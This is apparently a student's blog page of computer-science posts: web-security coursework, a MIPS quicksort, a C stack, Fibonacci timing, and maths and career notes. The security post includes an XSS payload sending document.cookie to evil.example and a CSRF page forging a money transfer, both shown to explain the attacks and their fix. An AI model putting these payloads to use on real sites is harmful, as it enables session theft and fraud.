Category: Computer Science

  • Information Security – Project 4

    This afternoon, I started on project 4 for introduction to information security (IIS). The goal of this project is to have us students learn more about web security, and it consists of three objectives, carrying out three web attacks: a cross-site scripting (XSS) attack, a cross-site request forgery (CSRF) attack, and a structured query language (SQL) injection attack. And although I’m very familiar with the terms, I’ve never actually carried out any of those attacks in either an academic or a professional setting. In this post, I’ll share some of the things I learned while spending four hours in a cafe chipping away at the project.

    Cross site request forgery (CSRF)

    This attack was very straightforward: inspect the source code of the (PHP) files and carefully tease out which form inputs could be set in the body of the HTTP POST.
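
    To make the mechanics concrete, here’s a sketch of the kind of page a CSRF attack serves to a victim: hidden form inputs plus an auto-submitting form, so the victim’s browser fires the POST (session cookies and all) at the target site. The endpoint and field names below (transfer.php, to, amount) are hypothetical stand-ins, not the project’s; I’m using Python only to build the HTML string.

    ```python
    # Build a hypothetical CSRF page. When a logged-in victim opens this HTML,
    # the browser auto-submits the form, sending a POST (with the victim's
    # session cookies) to the target site. All names and URLs here are made up.
    def build_csrf_page(action_url, fields):
        inputs = "\n".join(
            '  <input type="hidden" name="{}" value="{}">'.format(name, value)
            for name, value in fields.items()
        )
        return (
            '<html><body onload="document.forms[0].submit()">\n'
            '<form action="{}" method="POST">\n{}\n</form>\n'
            '</body></html>'
        ).format(action_url, inputs)

    page = build_csrf_page("http://bank.example/transfer.php",
                           {"to": "attacker", "amount": "1000"})
    ```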

    Cross site scripting (XSS)

    This task was a ton of fun. Initially, I headed down an entirely wrong path and found myself getting very frustrated. Because of the video lectures, I had wrongly assumed that the only way to perform the attack was to embed an iframe in my hand-crafted HTML page, the iframe loading the contents of the remote website, the target of the attack. And although this is entirely possible, embedding an iframe is unnecessary: what I really needed to do was send an HTTP POST to the remote site, embedding JavaScript in one of the form values, carefully ensuring that when the page renders in the browser, it’s identical to the original website.
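
    To illustrate why the attack works (a toy sketch, not the project’s actual pages), here’s the difference between a server that interpolates a form value straight into HTML and one that escapes it first with Python’s html.escape; in the first case the browser executes the payload, in the second it merely displays it as text.

    ```python
    import html

    # A hypothetical attacker-supplied form value
    payload = '<script>new Image().src = "http://evil.example/?c=" + document.cookie;</script>'

    def render_unsafe(comment):
        # Vulnerable: the form value lands in the page verbatim, so the
        # browser will happily execute the embedded <script> element
        return "<p>Latest comment: " + comment + "</p>"

    def render_safe(comment):
        # Escaped: angle brackets become entities, so the payload renders as text
        return "<p>Latest comment: " + html.escape(comment) + "</p>"
    ```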

  • Week 1 of master’s in computer science

    January 7th, 2019 marks the first day of my computer science master’s program through Georgia Tech. The week leading up to the first day was somewhat stressful since I was mid-flight (returning to Seattle from London), my plane hovering over the massive blue sea, while I frantically typed away on my keyboard trying to register for a course in my allotted time window. Because of the spotty internet connection on the airplane, it took me about an hour and a half to register for my course, and by that point the open spots had filled up so fast that I was positioned 100+ deep on the wait list (which, I discovered later on after reading online posts, is normal, and meant I would likely get into the course, which I did).

    Anyways, despite all that headache, I’m officially enrolled in a course that I’ve wanted to take for a very, very long time: Introduction to Operating Systems. So far, although it’s only been one week, I love the course, for multiple reasons.

    First, I love the collaborative nature and sense of community of the program. Before getting into this master’s program, I was taking a handful of undergraduate computer science courses (e.g. computer organization, discrete mathematics, data structures) from the University of North Dakota and the University of Northern Iowa, two excellent schools that offered courses through their distance learning platforms. Now, although I learned a lot from those courses, I always felt like I was working in isolation, by myself, my only interaction being a few short threaded e-mails with the professors. But now, with this course, there’s an online forum (i.e. Piazza) and a chatty chatroom (via Slack, paid for out of pocket by one of the TAs of the course), where students fire off questions and comments (especially random comments in the #random Slack channel). So in a sense, despite never meeting these folks, there’s a sense of camaraderie, a shared goal.

    Second, I’m learning a ton of material that’s not only applicable to my day-to-day job (as a software engineer) but material that I’m genuinely interested in. For the first week, the professor of the course has us reading a 30-page white paper (titled “Introduction to Threading”) written in 1989, a seminal piece of work (on threads and concurrency) that gives me perspective on, and appreciation for, my industry. In addition to reading the white paper, I’m watching lectures covering fundamental operating system concepts (e.g. processes, virtual memory) and, above all, writing C code! A ton of C code!

    The project has us writing code for a multi-threaded client and a multi-threaded web server (think implementing the HTTP protocol), intended to teach us how to write safe, concurrent systems that utilize the threading facilities offered by the operating system.
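
    The course project itself is in C, but the overall shape of a thread-per-connection server is easy to sketch. Here’s a toy Python version (the function names and the canned one-line response are mine, not the assignment’s): an accept loop hands each incoming connection to its own worker thread.

    ```python
    import socket
    import threading

    def handle_client(conn):
        """Worker thread: read the (toy) request, write a minimal HTTP response."""
        with conn:
            conn.recv(1024)  # ignore the request contents in this sketch
            conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 5\r\n\r\nhello")

    def serve(host="127.0.0.1", port=0):
        """Accept connections forever, one thread per client; returns (host, port)."""
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.bind((host, port))  # port 0 lets the OS pick a free port
        server.listen()

        def accept_loop():
            while True:
                conn, _addr = server.accept()
                threading.Thread(target=handle_client, args=(conn,), daemon=True).start()

        threading.Thread(target=accept_loop, daemon=True).start()
        return server.getsockname()
    ```

    Thread-per-connection is the simplest concurrency model; the course material also covers bounded thread pools, which avoid spawning an unbounded number of threads under load.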

  • History of the i, j, k variables?

    Any time you read code (in production or from a textbook), you’ll often see for-loop control variables declared as i, j, and k. And for most of my programming career, I never really questioned why we specifically chose those three letters. Why not m (a great letter), or c or d or e, or any other letter for that matter? Seems rather arbitrary.

    But I suspect that it has to do with William Rowan Hamilton, the famous Irish mathematician. In the 1840s, Hamilton introduced the quaternions, using i, j, and k to denote the three imaginary units, and that notation carried over into the now-standard i, j, k basis-vector notation for vectors (in R3). So he may well be the person we need to thank when we type those three letters while programming.

  • Linear algebra – exam 1

    Earlier this morning, before starting the work week, I took my first linear algebra exam at the nearby Northgate Testing center.  The proctored exam covered the first four modules in the course, topics including:

    • Gaussian elimination (row echelon form)
    • Gauss–Jordan elimination (reduced row echelon form)
    • Adding, subtracting, multiplying matrices
    • Calculating the inverse of matrices (using identity matrices)
    • LU Factorization
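
    A couple of these topics translate directly into code. As a refresher for myself, here’s a small sketch (my own toy implementation, with only a zero-pivot check and no numerical pivoting) that inverts a matrix by running Gauss–Jordan elimination on the augmented block [A | I]:

    ```python
    def invert(matrix):
        """Invert a square matrix via Gauss-Jordan elimination on [A | I]."""
        n = len(matrix)
        # Augment each row of A with the matching row of the identity matrix
        aug = [row[:] + [1.0 if i == j else 0.0 for j in range(n)]
               for i, row in enumerate(matrix)]
        for col in range(n):
            # Swap in a row with a nonzero entry in this column (the pivot)
            pivot_row = next(r for r in range(col, n) if aug[r][col] != 0)
            aug[col], aug[pivot_row] = aug[pivot_row], aug[col]
            # Scale the pivot row so the pivot equals 1
            pivot = aug[col][col]
            aug[col] = [x / pivot for x in aug[col]]
            # Eliminate this column from every other row
            for r in range(n):
                if r != col:
                    factor = aug[r][col]
                    aug[r] = [x - factor * y for x, y in zip(aug[r], aug[col])]
        # Once the left half is reduced to I, the right half is the inverse
        return [row[n:] for row in aug]
    ```

    When A has no inverse, the next(...) call fails to find a pivot and raises StopIteration, which is this sketch’s crude way of reporting a singular matrix.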

    I felt well prepared (thanks again to Khan Academy and 3Blue1Brown): going into the exam, I had worked (and reworked) the suggested exercises in the textbook. Honestly, I think if I hadn’t attempted the exercises, my mind would’ve tricked me into believing that I understood the material. But that obviously wasn’t the case, because the different math problems had me fumbling around, furiously scribbling pencil all over my notebook paper, followed by vigorous strokes of erasing. Anyways, 1 exam down, 2 more to go.

    Next topic: calculating the determinant of a matrix (at this present moment, I have no idea what that means)


  • Assembly RA (return address)

    About a year has passed since I took computer organization, and I’m a bit disappointed by how much of the material has faded from my memory. I only realized this while reading about Exception Control Flow (ECF) in the book Computer Systems: A Programmer’s Perspective, when the authors mentioned:

    As with a procedure call, the processor pushes a return address on the stack before branching to the handler

    Section 8.1 Exceptions

    I had to pause for a moment because, despite having written a handful of assembly programs (one of them implementing quicksort), I had totally forgotten how the return address gets handled in assembly. But after reviewing an assembly program that I wrote earlier this year, I realized that the jal (jump and link) instruction directs the processor to store the return address into the $ra (return address) register. It’s then the callee’s responsibility to save that value on the stack and, after its routine finishes, restore it and call jr $ra (jump register).

    Here’s some sample code

    main:
        la $a0, numbers             # Load the address of numbers into $a0, the first argument
        li $a1, 0                   # Load 0 into $a1, the second argument (low)
        lw $t0, length              # Load the length of the array into temporary register $t0
        sub $a2, $t0, 1             # Subtract 1 from the length and store into $a2, the third argument (high)
        jal quicksort
        li $v0, 10                  # Load the exit syscall code
        syscall
    
    quicksort:
    
    quicksort_if:
    
        bge $a1, $a2, quicksort_end_if  # Return immediately unless low < high
    
    quicksort_body:
        addi $sp, $sp, -24          # Update the stack pointer, allocating room to save six registers
        sw $ra, 0($sp)              # Store the return address on the stack
        sw $s0, 4($sp)              # Store $s0 on the stack
        sw $s1, 8($sp)              # Store $s1 on the stack
        sw $s2, 12($sp)             # Store $s2 on the stack
        sw $s3, 16($sp)             # Store $s3 on the stack
        sw $s4, 20($sp)             # Store $s4 on the stack
        move $s0, $a0               # Save $a0 (address of array) into $s0
        move $s1, $a1               # Save $a1 (low) into $s1
        move $s2, $a2               # Save $a2 (high) into $s2
        jal partition               # Call the subprogram partition
        move $s4, $v0               # Save the pivot position (returned in $v0) into $s4
        move $a0, $s0               # Move the array address into $a0
        move $a1, $s1               # Move low into $a1
        move $a2, $s4               # Move the pivot position into $a2
        sub $a2, $a2, 1             # Subtract 1 from $a2 (i.e. pivot - 1)
        jal quicksort               # First recursive call (i.e. quicksort(array, low, pivot - 1))
        move $a0, $s0               # Move the array address into $a0
        move $a1, $s4               # Move the pivot position into $a1
        add $a1, $a1, 1             # Add 1 to $a1 (i.e. pivot + 1)
        move $a2, $s2               # Move high (i.e. $s2) into $a2
        jal quicksort               # Second recursive call (i.e. quicksort(array, pivot + 1, high))
        lw $ra, 0($sp)              # Restore the return address from the stack into $ra
        lw $s0, 4($sp)              # Restore $s0 from the stack
        lw $s1, 8($sp)              # Restore $s1 from the stack
        lw $s2, 12($sp)             # Restore $s2 from the stack
        lw $s3, 16($sp)             # Restore $s3 from the stack
        lw $s4, 20($sp)             # Restore $s4 from the stack
        addi $sp, $sp, 24           # Pop the call frame
    
    quicksort_end_if:
        jr $ra                      # Jump back to the caller's return address

  • Flexing C muscles

    I’ve been sharpening my C programming skills because I’m now working on a team (i.e. EC2 Networking) within Amazon Web Services that requires lower-level software development skills. And I must say, I’m truly rusty. A noob. On top of that, my only experience with C in the past was fairly superficial: me dabbling here and there in the K&R book, long before I had taken any computer science courses. But since taking computer organization and data structures, I now have a solid understanding of pointers and their practical uses.

    But I digress.

    I’m currently working through a book written by Zed Shaw, the book titled “Learn C the hard way.” I had picked up the book at the local library in Seattle, stumbling upon it while I was running my fingers along the spines of books in the computer science section. This book has mixed reviews. Some websites strongly dissuade readers from reading anything published by this particular author.  But others recommend it. So, I’m taking their advice with a grain of salt and forming my own opinion.

    At the end of every chapter, the author recommends some extra credit exercises.  In one of these exercises, the author suggests implementing a stack data structure in C.  Now, there are two popular implementations when building a stack: using an array and using a linked list. So, I took this exercise as an opportunity to write a simple stack data structure using linked lists (you gotta love them C pointers).

    Here’s the program output:

    ./stack_linked_list
    
    Stack is empty. Pushing 10 to the top of stack
    Stack is not empty. Pushing 20 to the top of the stack
    Stack is not empty. Pushing 30 to the top of the stack
    Popped item: 30
    Peeking at next item: 20
    Peeking at next item: 20
    Peeking at next item: 20
    Popped item: 20
    Popped item: 10
    Popped item: -1

    And the corresponding code:

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdbool.h>
    
    struct Node {
        int value;
        struct Node * next;
    };
    
    struct Stack {
        int count;
        struct Node * top;
    };
    
    
    bool isEmpty(struct Stack * stack)
    {
        return stack->top == NULL;
    }
    
    void push(struct Stack * stack, int item)
    {
        struct Node * node = malloc(sizeof(struct Node));
        node->value = item;
        node->next = stack->top;    /* NULL when the stack is empty */
    
        if (stack->top == NULL){
            printf("Stack is empty. Pushing %i to the top of stack\n", item);
        } else {
            printf("Stack is not empty. Pushing %i to the top of the stack\n", item);
        }
    
        stack->top = node;
        stack->count++;
    }
    int pop(struct Stack * stack)
    {
        if (isEmpty(stack)){
            return -1;
        }
    
        struct Node * node = stack->top;
        int value = node->value;
        stack->top = node->next;
        stack->count--;
        free(node);    /* avoid leaking the popped node */
    
        return value;
    }
    
    int peek(struct Stack * stack)
    {
        if (isEmpty(stack)){
            return -1;
        }
    
        return stack->top->value;
    }
    
    
    int main(int argc, char * argv[])
    {
        struct Stack stack = { 0, NULL };    /* initialize: top must start out NULL */
        push(&stack, 10);
        push(&stack, 20);
        push(&stack, 30);
        printf("Popped item: %i\n", pop(&stack));
        printf("Peeking at next item: %i\n", peek(&stack));
        printf("Peeking at next item: %i\n", peek(&stack));
        printf("Peeking at next item: %i\n", peek(&stack));
        printf("Popped item: %i\n", pop(&stack));
        printf("Popped item: %i\n", pop(&stack));
        printf("Popped item: %i\n", pop(&stack));
        return 0;
    }


  • The beauty of dynamic programming

    I just discovered dynamic programming and damn, I’m blown away by the concept. The other day, while working through a homework assignment, I compared the run times of two Python functions that I wrote, one written recursively and the other in a dynamic programming fashion. Starting with the recursive solution, I arrived at the following:

    def fibonacci(n):
        if n == 0:
            return 0
        if n == 1:
            return 1
        return fibonacci(n-1) + fibonacci(n-2)
    

    That’s a fairly standard implementation of Fibonacci. There are two base cases: n=0 and n=1. When n is either of those two numbers, the function simply returns 0 or 1, respectively. But for any other number, the function recursively calls itself until reaching the aforementioned base cases.

    So far so good, right?  And for calculating small values of n, this implementation doesn’t really present a problem. But say we want to calculate fibonacci when n equals 40. How long does this take? Alarmingly, this computation hovers around 45 seconds:

    ./fibonacci.py 40
    fibonacci(40) = 102334155 took 45.22154 seconds
    

    Now, what if we run the same calculation, but this time using a dynamic programming technique? How much time does that shave off?

    ./fibonacci.py  --dynamic-programming 40
    fibonacci(40) = 102334155 took 0.00002 seconds
    

    What?! From 45 seconds down to under a millisecond?! How is that possible?

    def fibonacci_dynamic_programming(n):
        fibonacci = [0, 1]
        for _ in range(n - 1):
            fibonacci.append(fibonacci[-1] + fibonacci[-2])
        return fibonacci[n]

    As you can see from the code above, instead of recursively calling fibonacci, we iteratively calculate all the values. In other words, this implementation runs linearly (i.e. in direct proportion to n), unlike the first, recursive implementation, which runs exponentially.
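
    For what it’s worth, you can get the same linear-time behavior while keeping the recursive shape by caching (memoizing) each value the first time it’s computed; this variant isn’t from my assignment, it’s just Python’s functools.lru_cache doing the bookkeeping:

    ```python
    from functools import lru_cache

    @lru_cache(maxsize=None)
    def fibonacci_memoized(n):
        # Each distinct n is computed once; repeat calls hit the cache,
        # collapsing the exponential call tree down to O(n) work
        if n < 2:
            return n
        return fibonacci_memoized(n - 1) + fibonacci_memoized(n - 2)
    ```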


  • Wrapping up discrete mathematics course

    Last Friday, I took the final exam for my (distance learning) discrete mathematics course, and just now I logged into the student portal (i.e. Blackboard), surprised to find that my exam had not only been graded but that my final grade had been posted as well. I finished the course with an 88%, a B, a few points short of an A. In the past, I would’ve incessantly beaten myself up over not achieving the highest grade, denigrating myself with self-destructive thoughts: if only I tried harder … if only I studied more … if only I was smarter …

     But not this time.

    This time, I’m inhibiting those thoughts. Instead, I’m celebrating. Celebrating that I’m fortunate enough to be able to take this mathematics course, a course where I learned about writing proofs, solving Diophantine equations, applying set theory, counting with modular arithmetic, proving assertions with mathematical induction, and converting recursive functions into closed-form functions using the characteristic-equation method. Prior to the course, I had never been exposed to those concepts. Looking back, I had only vaguely heard of those terms. And who knows if I’ll get to apply any of those concepts as I pursue a master’s (maybe a PhD, one day). Who knows if I’ll be lucky enough to apply that knowledge to my job as a software engineer.
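
    As a small taste of the Diophantine material: the extended Euclidean algorithm finds integers x and y satisfying ax + by = gcd(a, b), which is the key step in solving a linear Diophantine equation. Here’s a quick sketch from memory (my own code, not the course’s):

    ```python
    def extended_gcd(a, b):
        """Return (g, x, y) such that a*x + b*y == g == gcd(a, b)."""
        if b == 0:
            return a, 1, 0
        g, x, y = extended_gcd(b, a % b)
        # Back-substitute, using the fact that gcd(a, b) == gcd(b, a mod b)
        return g, y, x - (a // b) * y
    ```

    For example, 12x + 42y = 6 is solvable because gcd(12, 42) = 6, and the algorithm hands back one particular (x, y) pair.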

    But who cares?  Because really, my goal was to stretch myself, learning more about my field and craft: computer science.

  • Graph theory and upcoming final exam

    I just scheduled my final exam for my discrete mathematics course, now that I’ve submitted my homework for the final assignment covering graph theory. Throughout this assignment, I was introduced to a variety of concepts: Leonhard Euler and his discovery of Euler paths and circuits, Hamiltonian paths and circuits, and a handful of graph-related terminology (e.g. vertices, edges, degrees, bridges, cut-vertices, isomorphic graphs, trees, forests).

    In addition to the concepts above, I learned two different ways to represent graphs in (computer) memory. One approach is an adjacency matrix, a matrix whose rows and columns are both indexed by the vertices. The second way to represent a graph is an incidence matrix; unlike an adjacency matrix, an incidence matrix’s columns are vertices, with the rows representing edges.
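
    Here’s a quick sketch (my own, not the course’s code) of both representations for a star-like graph with vertex 0 at the center; I’ve followed the layout described above, with one incidence-matrix row per edge and one column per vertex:

    ```python
    def adjacency_matrix(n, edges):
        """n x n matrix: entry (i, j) is 1 when vertices i and j share an edge."""
        m = [[0] * n for _ in range(n)]
        for u, v in edges:
            m[u][v] = m[v][u] = 1
        return m

    def incidence_matrix(n, edges):
        """One row per edge, one column per vertex (the layout described above)."""
        m = [[0] * n for _ in edges]
        for row, (u, v) in enumerate(edges):
            m[row][u] = m[row][v] = 1
        return m

    # A star-like graph: vertex 0 in the center, joined to vertices 1, 2 and 3
    star_edges = [(0, 1), (0, 2), (0, 3)]
    ```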

    Star-like graph

    Adjacency and incidence matrices: two ways to represent the (above) graph

    Although the lesson only scratched the surface on graph theory, I reveled in the fact that many of the terms I learned were actually terms that I encountered at work, terms that I had no idea were rooted in mathematics.

    For example, the term forest (in graph theory) is defined as a collection of trees; I encountered this term while working as a system administrator, a time when I managed Active Directory (a centralized authentication system) and all the security rules and policies bound to a forest.

    In addition to the example above, I find comfort in the fact that some data structures (e.g. binary search tree) and algorithms (e.g. breadth first search) that I’ve studied in the past build on top of graph theory.

    Star-like graphs that are nonisomorphic

    In any case, I really enjoyed learning about graph theory, a lesson I’ll continue to build on as I pursue my lifelong study of mathematics and computer science.

  • Software and system ownership

    Although I sometimes find getting paged for operational issues enervating, I wouldn’t have it any other way.

    It’s well known that software engineers at Amazon (Web Services) own their systems, end to end. This means that we not only develop and maintain our software, but we operate the underlying system, complete ownership.

    From a software point of view, one can run into an infinite number of issues. Got a build error? Roll up your sleeves and start digging through the compilation errors. Committed some code that broke the build? Fix it or roll back the changes. Defined a dependency that’s deprecated? Update the dependency and ensure your unit and integration tests pass.

    Similarly, we maintain the underlying system. If we deploy our systems to servers, physical or virtual (e.g. EC2), we must keep them alive, like breathing entities. From checking disk performance to checking heap allocation, we monitor our systems closely, configuring monitors to alert us when any component misbehaves.

    In other words, there’s no divide between development and operations. There’s no separate team that handles operational issues, no hand-off to DevOps. There’s no nonsense like writing our software and then chucking it over to another group to deploy, a group that would find that arrangement annoying at best and frustrating at worst. I’ve been in those positions, where I’m on the hook for deploying software that I cannot fix. Similarly, I’ve been in situations where a deployment fails and I must pull in someone who’s more familiar with the code base.

    But now, I’m in a position where I’m responsible for the code I write.

    Why is this important?

    Although some would argue that software developers should stick to software development, and that there should be a clear separation of duties, I believe that owning a system end to end promotes operational excellence and a sense of ownership.